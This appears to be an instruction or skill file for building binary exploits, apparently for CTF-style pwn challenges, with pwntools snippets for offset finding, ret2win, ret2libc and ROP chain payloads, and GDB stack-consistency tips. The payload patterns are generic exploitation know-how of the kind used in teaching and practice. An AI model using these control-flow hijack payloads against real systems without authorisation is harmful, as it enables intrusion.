Exploit Development

Build working exploits based on vulnerability analysis.

Exploit Development Process

1. Start from template - Use templates/exploit.py
2. Find offset - Use cyclic pattern
3. Identify target - Win function, ROP chain, shellcode
4. Handle mitigations - Leak addresses if needed
5. Build payload - Padding + control flow hijack
6. Test locally - With and without GDB
7. Test remote - Adjust for remote environment

Stack Consistency (CRITICAL)

Always use fixed argv[0] and empty environment:

ARGV0 = "/pwn"
ENV = {}

def conn():
    if args.GDB:
        return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
    else:
        return process([EXECUTABLE], env=ENV, argv=[ARGV0])

This ensures stack addresses match between normal run and GDB debug.

Finding Offset

# Generate pattern
from pwn import cyclic, cyclic_find
payload = cyclic(200)

# After crash, find offset
# In GDB: cyclic -l 0x61616168
offset = cyclic_find(0x61616168)

Common Payload Patterns

Simple ret2win

payload = b'A' * offset
payload += p64(win_addr)

ret2win with alignment

payload = b'A' * offset
payload += p64(ret_gadget)  # 16-byte alignment
payload += p64(win_addr)

ret2libc

payload = b'A' * offset
payload += p64(ret_gadget)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)

ROP with pwntools

rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()

Debugging Tips

• context.log_level = 'debug' for verbose output
• gdb.attach(p) to attach to running process
• pause() to stop and inspect
• Print addresses: print(f"addr: {hex(addr)}")

Output

Produce exploit.py using the template.